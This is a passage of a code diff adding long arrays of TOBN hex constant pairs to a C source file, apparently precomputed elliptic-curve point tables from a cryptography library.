+     TOBN(0x6f0b3462, 0x6ffeec22), TOBN(0x9d91bcea, 0x36cdd8fb),
+     TOBN(0xac83363c, 0xa105be47), TOBN(0x81ba76c1, 0x069710e3),
+     TOBN(0x3d1b24cb, 0x28c682c6), TOBN(0x27f25228, 0x8612575b),
+     TOBN(0xb587c779, 0xe8e66e98), TOBN(0x7b0c03e9, 0x405eb1fe),
+     TOBN(0xfdf0d030, 0x15b548e7), TOBN(0xa8be76e0, 0x38b36af7),
+     TOBN(0x4cdab04a, 0x4f310c40), TOBN(0x6287223e, 0xf47ecaec),
+     TOBN(0x678e6055, 0x8b399320), TOBN(0x61fe3fa6, 0xc01e4646),
+     TOBN(0xc482866b, 0x03261a5e), TOBN(0xdfcf45b8, 0x5c2f244a),
+     TOBN(0x8fab9a51, 0x2f684b43), TOBN(0xf796c654, 0xc7220a66),
+     TOBN(0x1d90707e, 0xf5afa58f), TOBN(0x2c421d97, 0x4fdbe0de),
+     TOBN(0xc4f4cda3, 0xaf2ebc2f), TOBN(0xa0af843d, 0xcb4efe24),
+     TOBN(0x53b857c1, 0x9ccd10b1), TOBN(0xddc9d1eb, 0x914d3e04),
+     TOBN(0x7bdec8bb, 0x62771deb), TOBN(0x829277aa, 0x91c5aa81),
+     TOBN(0x7af18dd6, 0x832391ae), TOBN(0x1740f316, 0xc71a84ca),}
+    ,
+    {TOBN(0x8928e99a, 0xeeaf8c49), TOBN(0xee7aa73d, 0x6e24d728),
+     TOBN(0x4c5007c2, 0xe72b156c), TOBN(0x5fcf57c5, 0xed408a1d),
+     TOBN(0x9f719e39, 0xb6057604), TOBN(0x7d343c01, 0xc2868bbf),
+     TOBN(0x2cca254b, 0x7e103e2d), TOBN(0xe6eb38a9, 0xf131bea2),
+     TOBN(0xb33e624f, 0x8be762b4), TOBN(0x2a9ee4d1, 0x058e3413),
+     TOBN(0x968e6369, 0x67d805fa), TOBN(0x9848949b, 0x7db8bfd7),
+     TOBN(0x5308d7e5, 0xd23a8417), TOBN(0x892f3b1d, 0xf3e29da5),
+     TOBN(0xc95c139e, 0x3dee471f), TOBN(0x8631594d, 0xd757e089),
+     TOBN(0xe0c82a3c, 0xde918dcc), TOBN(0x2e7b5994, 0x26fdcf4b),
+     TOBN(0x82c50249, 0x32cb1b2d), TOBN(0xea613a9d, 0x7657ae07),
+     TOBN(0xc2eb5f6c, 0xf1fdc9f7), TOBN(0xb6eae8b8, 0x879fe682),
+     TOBN(0x253dfee0, 0x591cbc7f), TOBN(0x000da713, 0x3e1290e6),
+     TOBN(0x1083e2ea, 0x1f095615), TOBN(0x0a28ad77, 0x14e68c33),
+     TOBN(0x6bfc0252, 0x3d8818be), TOBN(0xb585113a, 0xf35850cd),
+     TOBN(0x7d935f0b, 0x30df8aa1), TOBN(0xaddda07c, 0x4ab7e3ac),
+     TOBN(0x92c34299, 0x552f00cb), TOBN(0xc33ed1de, 0x2909df6c),
+     TOBN(0x22c2195d, 0x80e87766), TOBN(0x9e99e6d8, 0x9ddf4ac0),
+     TOBN(0x09642e4e, 0x65e74934), TOBN(0x2610ffa2, 0xff1ff241),
+     TOBN(0x4d1d47d4, 0x751c8159), TOBN(0x697b4985, 0xaf3a9363),
+     TOBN(0x0318ca46, 0x87477c33), TOBN(0xa90cb565, 0x9441eff3),
+     TOBN(0x58bb3848, 0x36f024cb), TOBN(0x85be1f77, 0x36016168),
+     TOBN(0x6c59587c, 0xdc7e07f1), TOBN(0x191be071, 0xaf1d8f02),
+     TOBN(0xbf169fa5, 0xcca5e55c), TOBN(0x3864ba3c, 0xf7d04eac),
+     TOBN(0x915e367f, 0x8d7d05db), TOBN(0xb48a876d, 0xa6549e5d),
+     TOBN(0xef89c656, 0x580e40a2), TOBN(0xf194ed8c, 0x728068bc),
+     TOBN(0x74528045, 0xa47990c9), TOBN(0xf53fc7d7, 0x5e1a4649),
+     TOBN(0xbec5ae9b, 0x78593e7d), TOBN(0x2cac4ee3, 0x41db65d7),
+     TOBN(0xa8c1eb24, 0x04a3d39b), TOBN(0x53b7d634, 0x03f8f3ef),
+     TOBN(0x2dc40d48, 0x3e07113c), TOBN(0x6e4a5d39, 0x7d8b63ae),
+     TOBN(0x5582a94b, 0x79684c2b), TOBN(0x932b33d4, 0x622da26c),
+     TOBN(0xf534f651, 0x0dbbf08d), TOBN(0x211d07c9, 0x64c23a52),
+     TOBN(0x0eeece0f, 0xee5bdc9b), TOBN(0xdf178168, 0xf7015558),
+     TOBN(0xd4294635, 0x0a712229), TOBN(0x93cbe448, 0x09273f8c),
+     TOBN(0x00b095ef, 0x8f13bc83), TOBN(0xbb741972, 0x8798978c),
+     TOBN(0x9d7309a2, 0x56dbe6e7), TOBN(0xe578ec56, 0x5a5d39ec),
+     TOBN(0x3961151b, 0x851f9a31), TOBN(0x2da7715d, 0xe5709eb4),
+     TOBN(0x867f3017, 0x53dfabf0), TOBN(0x728d2078, 0xb8e39259),
+     TOBN(0x5c75a0cd, 0x815d9958), TOBN(0xf84867a6, 0x16603be1),
+     TOBN(0xc865b13d, 0x70e35b1c), TOBN(0x02414468, 0x19b03e2c),
+     TOBN(0xe46041da, 0xac1f3121), TOBN(0x7c9017ad, 0x6f028a7c),
+     TOBN(0xabc96de9, 0x0a482873), TOBN(0x4265d6b1, 0xb77e54d4),
+     TOBN(0x68c38e79, 0xa57d88e7), TOBN(0xd461d766, 0x9ce82de3),
+     TOBN(0x817a9ec5, 0x64a7e489), TOBN(0xcc5675cd, 0xa0def5f2),
+     TOBN(0x9a00e785, 0x985d494e), TOBN(0xc626833f, 0x1b03514a),
+     TOBN(0xabe7905a, 0x83cdd60e), TOBN(0x50602fb5, 0xa1170184),
+     TOBN(0x689886cd, 0xb023642a), TOBN(0xd568d090, 0xa6e1fb00),
+     TOBN(0x5b1922c7, 0x0259217f), TOBN(0x93831cd9, 0xc43141e4),
+     TOBN(0xdfca3587, 0x0c95f86e), TOBN(0xdec2057a, 0x568ae828),
+     TOBN(0xc44ea599, 0xf98a759a), TOBN(0x55a0a7a2, 0xf7c23c1d),
+     TOBN(0xd5ffb6e6, 0x94c4f687), TOBN(0x3563cce2, 0x12848478),
+     TOBN(0x812b3517, 0xe7b1fbe1), TOBN(0x8a7dc979, 0x4f7338e0),
+     TOBN(0x211ecee9, 0x52d048db), TOBN(0x2eea4056, 0xc86ea3b8),
+     TOBN(0xd8cb68a7, 0xba772b34), TOBN(0xe16ed341, 0x5f4e2541),
+     TOBN(0x9b32f6a6, 0x0fec14db), TOBN(0xeee376f7, 0x391698be),
+     TOBN(0xe9a7aa17, 0x83674c02), TOBN(0x65832f97, 0x5843022a),
+     TOBN(0x29f3a8da, 0x5ba4990f), TOBN(0x79a59c3a, 0xfb8e3216),
+     TOBN(0x9cdc4d2e, 0xbd19bb16), TOBN(0xc6c7cfd0, 0xb3262d86),
+     TOBN(0xd4ce14d0, 0x969c0b47), TOBN(0x1fa352b7, 0x13e56128),
+     TOBN(0x383d55b8, 0x973db6d3), TOBN(0x71836850, 0xe8e5b7bf),
+     TOBN(0xc7714596, 0xe6bb571f), TOBN(0x259df31f, 0x2d5b2dd2),
+     TOBN(0x568f8925, 0x913cc16d), TOBN(0x18bc5b6d, 0xe1a26f5a),
+     TOBN(0xdfa413be, 0xf5f499ae), TOBN(0xf8835dec, 0xc3f0ae84),
+     TOBN(0xb6e60bd8, 0x65a40ab0), TOBN(0x65596439, 0x194b377e),
+     TOBN(0xbcd85625, 0x92084a69), TOBN(0x5ce433b9, 0x4f23ede0),
+     TOBN(0xe8e8f04f, 0x6ad65143), TOBN(0x11511827, 0xd6e14af6),
+     TOBN(0x3d390a10, 0x8295c0c7), TOBN(0x71e29ee4, 0x621eba16),
+     TOBN(0xa588fc09, 0x63717b46), TOBN(0x02be02fe, 0xe06ad4a2),
+     TOBN(0x931558c6, 0x04c22b22), TOBN(0xbb4d4bd6, 0x12f3c849),
+     TOBN(0x54a4f496, 0x20efd662), TOBN(0x92ba6d20, 0xc5952d14),
+     TOBN(0x2db8ea1e, 0xcc9784c2), TOBN(0x81cc10ca, 0x4b353644),
+     TOBN(0x40b570ad, 0x4b4d7f6c), TOBN(0x5c9f1d96, 0x84a1dcd2),
+     TOBN(0x01379f81, 0x3147e797), TOBN(0xe5c6097b, 0x2bd499f5),
+     TOBN(0x40dcafa6, 0x328e5e20), TOBN(0xf7b5244a, 0x54815550),
+     TOBN(0xb9a4f118, 0x47bfc978), TOBN(0x0ea0e79f, 0xd25825b1),
+     TOBN(0xa50f96eb, 0x646c7ecf), TOBN(0xeb811493, 0x446dea9d),
+     TOBN(0x2af04677, 0xdfabcf69), TOBN(0xbe3a068f, 0xc713f6e8),
+     TOBN(0x860d523d, 0x42e06189), TOBN(0xbf077941, 0x4e3aff13),
+     TOBN(0x0b616dca, 0xc1b20650), TOBN(0xe66dd6d1, 0x2131300d),
+     TOBN(0xd4a0fd67, 0xff99abde), TOBN(0xc9903550, 0xc7aac50d),
+     TOBN(0x022ecf8b, 0x7c46b2d7), TOBN(0x3333b1e8, 0x3abf92af),
+     TOBN(0x11cc113c, 0x6c491c14), TOBN(0x05976688, 0x80dd3f88),
+     TOBN(0xf5b4d9e7, 0x29d932ed), TOBN(0xe982aad8, 0xa2c38b6d),
+     TOBN(0x6f925347, 0x8be0dcf0), TOBN(0x700080ae, 0x65ca53f2),
+     TOBN(0xd8131156, 0x443ca77f), TOBN(0xe92d6942, 0xec51f984),
+     TOBN(0xd2a08af8, 0x85dfe9ae), TOBN(0xd825d9a5, 0x4d2a86ca),
+     TOBN(0x2c53988d, 0x39dff020), TOBN(0xf38b135a, 0x430cdc40),
+     TOBN(0x0c918ae0, 0x62a7150b), TOBN(0xf31fd8de, 0x0c340e9b),
+     TOBN(0xafa0e7ae, 0x4dbbf02e), TOBN(0x5847fb2a, 0x5eba6239),
+     TOBN(0x6b1647dc, 0xdccbac8b), TOBN(0xb642aa78, 0x06f485c8),
+     TOBN(0x873f3765, 0x7038ecdf), TOBN(0x2ce5e865, 0xfa49d3fe),
+     TOBN(0xea223788, 0xc98c4400), TOBN(0x8104a8cd, 0xf1fa5279),
+     TOBN(0xbcf7cc7a, 0x06becfd7), TOBN(0x49424316, 0xc8f974ae),
+     TOBN(0xc0da65e7, 0x84d6365d), TOBN(0xbcb7443f, 0x8f759fb8),
+     TOBN(0x35c712b1, 0x7ae81930), TOBN(0x80428dff, 0x4c6e08ab),
+     TOBN(0xf19dafef, 0xa4faf843), TOBN(0xced8538d, 0xffa9855f),
+     TOBN(0x20ac409c, 0xbe3ac7ce), TOBN(0x358c1fb6, 0x882da71e),
+     TOBN(0xafa9c0e5, 0xfd349961), TOBN(0x2b2cfa51, 0x8421c2fc),
+     TOBN(0x2a80db17, 0xf3a28d38), TOBN(0xa8aba539, 0x5d138e7e),
+     TOBN(0x52012d1d, 0x6e96eb8d), TOBN(0x65d8dea0, 0xcbaf9622),
+     TOBN(0x57735447, 0xb264f56c), TOBN(0xbeebef3f, 0x1b6c8da2),
+     TOBN(0xfc346d98, 0xce785254), TOBN(0xd50e8d72, 0xbb64a161),
+     TOBN(0xc03567c7, 0x49794add), TOBN(0x15a76065, 0x752c7ef6),
+     TOBN(0x59f3a222, 0x961f23d6), TOBN(0x378e4438, 0x73ecc0b0),
+     TOBN(0xc74be434, 0x5a82fde4), TOBN(0xae509af2, 0xd8b9cf34),
+     TOBN(0x4a61ee46, 0x577f44a1), TOBN(0xe09b748c, 0xb611deeb),
+     TOBN(0xc0481b2c, 0xf5f7b884), TOBN(0x35626678, 0x61acfa6b),
+     TOBN(0x37f4c518, 0xbf8d21e6), TOBN(0x22d96531, 0xb205a76d),
+     TOBN(0x37fb85e1, 0x954073c0), TOBN(0xbceafe4f, 0x65b3a567),
+     TOBN(0xefecdef7, 0xbe42a582), TOBN(0xd3fc6080, 0x65046be6),
+     TOBN(0xc9af13c8, 0x09e8dba9), TOBN(0x1e6c9847, 0x641491ff),
+     TOBN(0x3b574925, 0xd30c31f7), TOBN(0xb7eb72ba, 0xac2a2122),
+     TOBN(0x776a0dac, 0xef0859e7), TOBN(0x06fec314, 0x21900942),
+     TOBN(0x2464bc10, 0xf8c22049), TOBN(0x9bfbcce7, 0x875ebf69),
+     TOBN(0xd7a88e2a, 0x4336326b), TOBN(0xda05261c, 0x5bc2acfa),
+     TOBN(0xc29f5bdc, 0xeba7efc8), TOBN(0x471237ca, 0x25dbbf2e),
+     TOBN(0xa72773f2, 0x2975f127), TOBN(0xdc744e8e, 0x04d0b326),
+     TOBN(0x38a7ed16, 0xa56edb73), TOBN(0x64357e37, 0x2c007e70),
+     TOBN(0xa167d15b, 0x5080b400), TOBN(0x07b41164, 0x23de4be1),
+     TOBN(0xb2d91e32, 0x74c89883), TOBN(0x3c162821, 0x2882e7ed),
+     TOBN(0xad6b36ba, 0x7503e482), TOBN(0x48434e8e, 0x0ea34331),
+     TOBN(0x79f4f24f, 0x2c7ae0b9), TOBN(0xc46fbf81, 0x1939b44a),
+     TOBN(0x76fefae8, 0x56595eb1), TOBN(0x417b66ab, 0xcd5f29c7),
+     TOBN(0x5f2332b2, 0xc5ceec20), TOBN(0xd69661ff, 0xe1a1cae2),
+     TOBN(0x5ede7e52, 0x9b0286e6), TOBN(0x9d062529, 0xe276b993),
+     TOBN(0x324794b0, 0x7e50122b), TOBN(0xdd744f8b, 0x4af07ca5),
+     TOBN(0x30a12f08, 0xd63fc97b), TOBN(0x39650f1a, 0x76626d9d),
+     TOBN(0x101b47f7, 0x1fa38477), TOBN(0x3d815f19, 0xd4dc124f),
+     TOBN(0x1569ae95, 0xb26eb58a), TOBN(0xc3cde188, 0x95fb1887),
+     TOBN(0x54e9f37b, 0xf9539a48), TOBN(0xb0100e06, 0x7408c1a5),
+     TOBN(0x821d9811, 0xea580cbb), TOBN(0x8af52d35, 0x86e50c56),
+     TOBN(0xdfbd9d47, 0xdbbf698b), TOBN(0x2961a1ea, 0x03dc1c73),
+     TOBN(0x203d38f8, 0xe76a5df8), TOBN(0x08a53a68, 0x6def707a),
+     TOBN(0x26eefb48, 0x1bee45d4), TOBN(0xb3cee346, 0x3c688036),
+     TOBN(0x463c5315, 0xc42f2469), TOBN(0x19d84d2e, 0x81378162),
+     TOBN(0x22d7c3c5, 0x1c4d349f), TOBN(0x65965844, 0x163d59c5),
+     TOBN(0xcf198c56, 0xb8abceae), TOBN(0x6fb1fb1b, 0x628559d5),
+     TOBN(0x8bbffd06, 0x07bf8fe3), TOBN(0x46259c58, 0x3467734b),
+     TOBN(0xd8953cea, 0x35f7f0d3), TOBN(0x1f0bece2, 0xd65b0ff1),
+     TOBN(0xf7d5b4b3, 0xf3c72914), TOBN(0x29e8ea95, 0x3cb53389),
+     TOBN(0x4a365626, 0x836b6d46), TOBN(0xe849f910, 0xea174fde),
+     TOBN(0x7ec62fbb, 0xf4737f21), TOBN(0xd8dba5ab, 0x6209f5ac),
+     TOBN(0x24b5d7a9, 0xa5f9adbe), TOBN(0x707d28f7, 0xa61dc768),
+     TOBN(0x7711460b, 0xcaa999ea), TOBN(0xba7b174d, 0x1c92e4cc),
+     TOBN(0x3c4bab66, 0x18d4bf2d), TOBN(0xb8f0c980, 0xeb8bd279),
+     TOBN(0x024bea9a, 0x324b4737), TOBN(0xfba9e423, 0x32a83bca),
+     TOBN(0x6e635643, 0xa232dced), TOBN(0x99619367, 0x2571c8ba),
+     TOBN(0xe8c9f357, 0x54b7032b), TOBN(0xf936b3ba, 0x2442d54a),
+     TOBN(0x2263f0f0, 0x8290c65a), TOBN(0x48989780, 0xee2c7fdb),
+     TOBN(0xadc5d55a, 0x13d4f95e), TOBN(0x737cff85, 0xad9b8500),
+     TOBN(0x271c557b, 0x8a73f43d), TOBN(0xbed617a4, 0xe18bc476),
+     TOBN(0x66245401, 0x7dfd8ab2), TOBN(0xae7b89ae, 0x3a2870aa),
+     TOBN(0x1b555f53, 0x23a7e545), TOBN(0x6791e247, 0xbe057e4c),
+     TOBN(0x860136ad, 0x324fa34d), TOBN(0xea111447, 0x4cbeae28),
+     TOBN(0x023a4270, 0xbedd3299), TOBN(0x3d5c3a7f, 0xc1c35c34),
+     TOBN(0xb0f6db67, 0x8d0412d2), TOBN(0xd92625e2, 0xfcdc6b9a),
+     TOBN(0x92ae5ccc, 0x4e28a982), TOBN(0xea251c36, 0x47a3ce7e),
+     TOBN(0x9d658932, 0x790691bf), TOBN(0xed610589, 0x06b736ae),
+     TOBN(0x712c2f04, 0xc0d63b6e), TOBN(0x5cf06fd5, 0xc63d488f),
+     TOBN(0x97363fac, 0xd9588e41), TOBN(0x1f9bf762, 0x2b93257e),
+     TOBN(0xa9d1ffc4, 0x667acace), TOBN(0x1cf4a1aa, 0x0a061ecf),
+     TOBN(0x40e48a49, 0xdc1818d0), TOBN(0x0643ff39, 0xa3621ab0),
+     TOBN(0x5768640c, 0xe39ef639), TOBN(0x1fc099ea, 0x04d86854),
+     TOBN(0x9130b9c3, 0xeccd28fd), TOBN(0xd743cbd2, 0x7eec54ab),
+     TOBN(0x052b146f, 0xe5b475b6), TOBN(0x058d9a82, 0x900a7d1f),
+     TOBN(0x65e02292, 0x91262b72), TOBN(0x96f924f9, 0xbb0edf03),
+     TOBN(0x5cfa59c8, 0xfe206842), TOBN(0xf6037004, 0x5eafa720),
+     TOBN(0x5f30699e, 0x18d7dd96), TOBN(0x381e8782, 0xcbab2495),
+     TOBN(0x91669b46, 0xdd8be949), TOBN(0xb40606f5, 0x26aae8ef),
+     TOBN(0x2812b839, 0xfc6751a4), TOBN(0x16196214, 0xfba800ef),
+     TOBN(0x4398d5ca, 0x4c1a2875), TOBN(0x720c00ee, 0x653d8349),
+     TOBN(0xc2699eb0, 0xd820007c), TOBN(0x880ee660, 0xa39b5825),
+     TOBN(0x70694694, 0x471f6984), TOBN(0xf7d16ea8, 0xe3dda99a),
+     TOBN(0x28d675b2, 0xc0519a23), TOBN(0x9ebf94fe, 0x4f6952e3),
+     TOBN(0xf28bb767, 0xa2294a8a), TOBN(0x85512b4d, 0xfe0af3f5),
+     TOBN(0x18958ba8, 0x99b16a0d), TOBN(0x95c2430c, 0xba7548a7),
+     TOBN(0xb30d1b10, 0xa16be615), TOBN(0xe3ebbb97, 0x85bfb74c),
+     TOBN(0xa3273cfe, 0x18549fdb), TOBN(0xf6e200bf, 0x4fcdb792),
+     TOBN(0x54a76e18, 0x83aba56c), TOBN(0x73ec66f6, 0x89ef6aa2),
+     TOBN(0x8d17add7, 0xd1b9a305), TOBN(0xa959c5b9, 0xb7ae1b9d),
+     TOBN(0x88643522, 0x6bcc094a), TOBN(0xcc5616c4, 0xd7d429b9),
+     TOBN(0xa6dada01, 0xe6a33f7c), TOBN(0xc6217a07, 0x9d4e70ad),
+     TOBN(0xd619a818, 0x09c15b7c), TOBN(0xea06b329, 0x0e80c854),
+     TOBN(0x174811ce, 0xa5f5e7b9), TOBN(0x66dfc310, 0x787c65f4),
+     TOBN(0x4ea7bd69, 0x3316ab54), TOBN(0xc12c4acb, 0x1dcc0f70),
+     TOBN(0xe4308d1a, 0x1e407dd9), TOBN(0xe8a3587c, 0x91afa997),
+     TOBN(0xea296c12, 0xab77b7a5), TOBN(0xb5ad49e4, 0x673c0d52),
+     TOBN(0x40f9b2b2, 0x7006085a), TOBN(0xa88ff340, 0x87bf6ec2),
+     TOBN(0x978603b1, 0x4e3066a6), TOBN(0xb3f99fc2, 0xb5e486e2),
+     TOBN(0x07b53f5e, 0xb2e63645), TOBN(0xbe57e547, 0x84c84232),
+     TOBN(0xd779c216, 0x7214d5cf), TOBN(0x617969cd, 0x029a3aca),
+     TOBN(0xd17668cd, 0x8a7017a0), TOBN(0x77b4d19a, 0xbe9b7ee8),
+     TOBN(0x58fd0e93, 0x9c161776), TOBN(0xa8c4f4ef, 0xd5968a72),
+     TOBN(0x296071cc, 0x67b3de77), TOBN(0xae3c0b8e, 0x634f7905),
+     TOBN(0x67e440c2, 0x8a7100c9), TOBN(0xbb8c3c1b, 0xeb4b9b42),
+     TOBN(0x6d71e8ea, 0xc51b3583), TOBN(0x7591f5af, 0x9525e642),
+     TOBN(0xf73a2f7b, 0x13f509f3), TOBN(0x618487aa, 0x5619ac9b),
+     TOBN(0x3a72e5f7, 0x9d61718a), TOBN(0x00413bcc, 0x7592d28c),
+     TOBN(0x7d9b11d3, 0x963c35cf), TOBN(0x77623bcf, 0xb90a46ed),
+     TOBN(0xdeef273b, 0xdcdd2a50), TOBN(0x4a741f9b, 0x0601846e),
+     TOBN(0x33b89e51, 0x0ec6e929), TOBN(0xcb02319f, 0x8b7f22cd),
+     TOBN(0xbbe1500d, 0x084bae24), TOBN(0x2f0ae8d7, 0x343d2693),
+     TOBN(0xacffb5f2, 0x7cdef811), TOBN(0xaa0c030a, 0x263fb94f),
+     TOBN(0x6eef0d61, 0xa0f442de), TOBN(0xf92e1817, 0x27b139d3),
+     TOBN(0x1ae6deb7, 0x0ad8bc28), TOBN(0xa89e38dc, 0xc0514130),
+     TOBN(0x81eeb865, 0xd2fdca23), TOBN(0x5a15ee08, 0xcc8ef895),
+     TOBN(0x768fa10a, 0x01905614), TOBN(0xeff5b8ef, 0x880ee19b),
+     TOBN(0xf0c0cabb, 0xcb1c8a0e), TOBN(0x2e1ee9cd, 0xb8c838f9),
+     TOBN(0x0587d8b8, 0x8a4a14c0), TOBN(0xf6f27896, 0x2ff698e5),
+     TOBN(0xed38ef1c, 0x89ee6256), TOBN(0xf44ee1fe, 0x6b353b45),
+     TOBN(0x9115c0c7, 0x70e903b3), TOBN(0xc78ec0a1, 0x818f31df),
+     TOBN(0x6c003324, 0xb7dccbc6), TOBN(0xd96dd1f3, 0x163bbc25),
+     TOBN(0x33aa82dd, 0x5cedd805), TOBN(0x123aae4f, 0x7f7eb2f1),
+     TOBN(0x1723fcf5, 0xa26262cd), TOBN(0x1f7f4d5d, 0x0060ebd5),
+     TOBN(0xf19c5c01, 0xb2eaa3af), TOBN(0x2ccb9b14, 0x9790accf),
+     TOBN(0x1f9c1cad, 0x52324aa6), TOBN(0x63200526, 0x7247df54),
+     TOBN(0x5732fe42, 0xbac96f82), TOBN(0x52fe771f, 0x01a1c384),
+     TOBN(0x546ca13d, 0xb1001684), TOBN(0xb56b4eee, 0xa1709f75),
+     TOBN(0x266545a9, 0xd5db8672), TOBN(0xed971c90, 0x1e8f3cfb),
+     TOBN(0x4e7d8691, 0xe3a07b29), TOBN(0x7570d9ec, 0xe4b696b9),
+     TOBN(0xdc5fa067, 0x7bc7e9ae), TOBN(0x68b44caf, 0xc82c4844),
+     TOBN(0x519d34b3, 0xbf44da80), TOBN(0x283834f9, 0x5ab32e66),
+     TOBN(0x6e608797, 0x6278a000), TOBN(0x1e62960e, 0x627312f6),
+     TOBN(0x9b87b27b, 0xe6901c55), TOBN(0x80e78538, 0x24fdbc1f),
+     TOBN(0xbbbc0951, 0x2facc27d), TOBN(0x06394239, 0xac143b5a),
+     TOBN(0x35bb4a40, 0x376c1944), TOBN(0x7cb62694, 0x63da1511),
+     TOBN(0xafd29161, 0xb7148a3b), TOBN(0xa6f9d9ed, 0x4e2ea2ee),
+     TOBN(0x15dc2ca2, 0x880dd212), TOBN(0x903c3813, 0xa61139a9),
+     TOBN(0x2aa7b46d, 0x6c0f8785), TOBN(0x36ce2871, 0x901c60ff),
+     TOBN(0xc683b028, 0xe10d9c12), TOBN(0x7573baa2, 0x032f33d3),
+     TOBN(0x87a9b1f6, 0x67a31b58), TOBN(0xfd3ed11a, 0xf4ffae12),
+     TOBN(0x83dcaa9a, 0x0cb2748e), TOBN(0x8239f018, 0x5d6fdf16),
+     TOBN(0xba67b49c, 0x72753941), TOBN(0x2beec455, 0xc321cb36),
+     TOBN(0x88015606, 0x3f8b84ce), TOBN(0x76417083, 0x8d38c86f),
+     TOBN(0x054f1ca7, 0x598953dd), TOBN(0xc939e110, 0x4e8e7429),
+     TOBN(0x9b1ac2b3, 0x5a914f2f), TOBN(0x39e35ed3, 0xe74b8f9c),
+     TOBN(0xd0debdb2, 0x781b2fb0), TOBN(0x1585638f, 0x2d997ba2),
+     TOBN(0x9c4b646e, 0x9e2fce99), TOBN(0x68a21081, 0x1e80857f),
+     TOBN(0x06d54e44, 0x3643b52a), TOBN(0xde8d6d63, 0x0d8eb843),
+     TOBN(0x70321563, 0x42146a0a), TOBN(0x8ba826f2, 0x5eaa3622),
+     TOBN(0x227a58bd, 0x86138787), TOBN(0x43b6c03c, 0x10281d37),
+     TOBN(0x6326afbb, 0xb54dde39), TOBN(0x744e5e8a, 0xdb6f2d5f),
+     TOBN(0x48b2a99a, 0xcff158e1), TOBN(0xa93c8fa0, 0xef87918f),
+     TOBN(0x2182f956, 0xde058c5c), TOBN(0x216235d2, 0x936f9e7a),
+     TOBN(0xace0c0db, 0xd2e31e67), TOBN(0xc96449bf, 0xf23ac3e7),
+     TOBN(0x7e9a2874, 0x170693bd), TOBN(0xa28e14fd, 0xa45e6335),
+     TOBN(0x5757f6b3, 0x56427344), TOBN(0x822e4556, 0xacf8edf9),
+     TOBN(0x2b7a6ee2, 0xe6a285cd), TOBN(0x5866f211, 0xa9df3af0),
+     TOBN(0x40dde2dd, 0xf845b844), TOBN(0x986c3726, 0x110e5e49),
+     TOBN(0x73680c2a, 0xf7172277), TOBN(0x57b94f0f, 0x0cccb244),
+     TOBN(0xbdff7267, 0x2d438ca7), TOBN(0xbad1ce11, 0xcf4663fd),
+     TOBN(0x9813ed9d, 0xd8f71cae), TOBN(0xf43272a6, 0x961fdaa6),
+     TOBN(0xbeff0119, 0xbd6d1637), TOBN(0xfebc4f91, 0x30361978),
+     TOBN(0x02b37a95, 0x2f41deff), TOBN(0x0e44a59a, 0xe63b89b7),
+     TOBN(0x673257dc, 0x143ff951), TOBN(0x19c02205, 0xd752baf4),
+     TOBN(0x46c23069, 0xc4b7d692), TOBN(0x2e6392c3, 0xfd1502ac),
+     TOBN(0x6057b1a2, 0x1b220846), TOBN(0xe51ff946, 0x0c1b5b63),}
+    ,
+    {TOBN(0x6e85cb51, 0x566c5c43), TOBN(0xcff9c919, 0x3597f046),
+     TOBN(0x9354e90c, 0x4994d94a), TOBN(0xe0a39332, 0x2147927d),
+     TOBN(0x8427fac1, 0x0dc1eb2b), TOBN(0x88cfd8c2, 0x2ff319fa),
+     TOBN(0xe2d4e684, 0x01965274), TOBN(0xfa2e067d, 0x67aaa746),
+     TOBN(0xb6d92a7f, 0x3e5f9f11), TOBN(0x9afe153a, 0xd6cb3b8e),
+     TOBN(0x4d1a6dd7, 0xddf800bd), TOBN(0xf6c13cc0, 0xcaf17e19),
+     TOBN(0x15f6c58e, 0x325fc3ee), TOBN(0x71095400, 0xa31dc3b2),
+     TOBN(0x168e7c07, 0xafa3d3e7), TOBN(0x3f8417a1, 0x94c7ae2d),
+     TOBN(0xec234772, 0x813b230d), TOBN(0x634d0f5f, 0x17344427),
+     TOBN(0x11548ab1, 0xd77fc56a), TOBN(0x7fab1750, 0xce06af77),
+     TOBN(0xb62c10a7, 0x4f7c4f83), TOBN(0xa7d2edc4, 0x220a67d9),
+     TOBN(0x1c404170, 0x921209a0), TOBN(0x0b9815a0, 0xface59f0),
+     TOBN(0x2842589b, 0x319540c3), TOBN(0x18490f59, 0xa283d6f8),
+     TOBN(0xa2731f84, 0xdaae9fcb), TOBN(0x3db6d960, 0xc3683ba0),
+     TOBN(0xc85c63bb, 0x14611069), TOBN(0xb19436af, 0x0788bf05),
+     TOBN(0x905459df, 0x347460d2), TOBN(0x73f6e094, 0xe11a7db1),
+     TOBN(0xdc7f938e, 0xb6357f37), TOBN(0xc5d00f79, 0x2bd8aa62),
+     TOBN(0xc878dcb9, 0x2ca979fc), TOBN(0x37e83ed9, 0xeb023a99),
+     TOBN(0x6b23e273, 0x1560bf3d), TOBN(0x1086e459, 0x1d0fae61),
+     TOBN(0x78248316, 0x9a9414bd), TOBN(0x1b956bc0, 0xf0ea9ea1),
+     TOBN(0x7b85bb91, 0xc31b9c38), TOBN(0x0c5aa90b, 0x48ef57b5),
+     TOBN(0xdedeb169, 0xaf3bab6f), TOBN(0xe610ad73, 0x2d373685),
+     TOBN(0xf13870df, 0x02ba8e15), TOBN(0x0337edb6, 0x8ca7f771),
+     TOBN(0xe4acf747, 0xb62c036c), TOBN(0xd921d576, 0xb6b94e81),
+     TOBN(0xdbc86439, 0x2c422f7a), TOBN(0xfb635362, 0xed348898),
+     TOBN(0x83084668, 0xc45bfcd1), TOBN(0xc357c9e3, 0x2b315e11),
+     TOBN(0xb173b540, 0x5b2e5b8c), TOBN(0x7e946931, 0xe102b9a4),
+     TOBN(0x17c890eb, 0x7b0fb199), TOBN(0xec225a83, 0xd61b662b),
+     TOBN(0xf306a3c8, 0xee3c76cb), TOBN(0x3cf11623, 0xd32a1f6e),
+     TOBN(0xe6d5ab64, 0x6863e956), TOBN(0x3b8a4cbe, 0x5c005c26),
+     TOBN(0xdcd529a5, 0x9ce6bb27), TOBN(0xc4afaa52, 0x04d4b16f),
+     TOBN(0xb0624a26, 0x7923798d), TOBN(0x85e56df6, 0x6b307fab),
+     TOBN(0x0281893c, 0x2bf29698), TOBN(0x91fc19a4, 0xd7ce7603),
+     TOBN(0x75a5dca3, 0xad9a558f), TOBN(0x40ceb3fa, 0x4d50bf77),
+     TOBN(0x1baf6060, 0xbc9ba369), TOBN(0x927e1037, 0x597888c2),
+     TOBN(0xd936bf19, 0x86a34c07), TOBN(0xd4cf10c1, 0xc34ae980),
+     TOBN(0x3a3e5334, 0x859dd614), TOBN(0x9c475b5b, 0x18d0c8ee),
+     TOBN(0x63080d1f, 0x07cd51d5), TOBN(0xc9c0d0a6, 0xb88b4326),
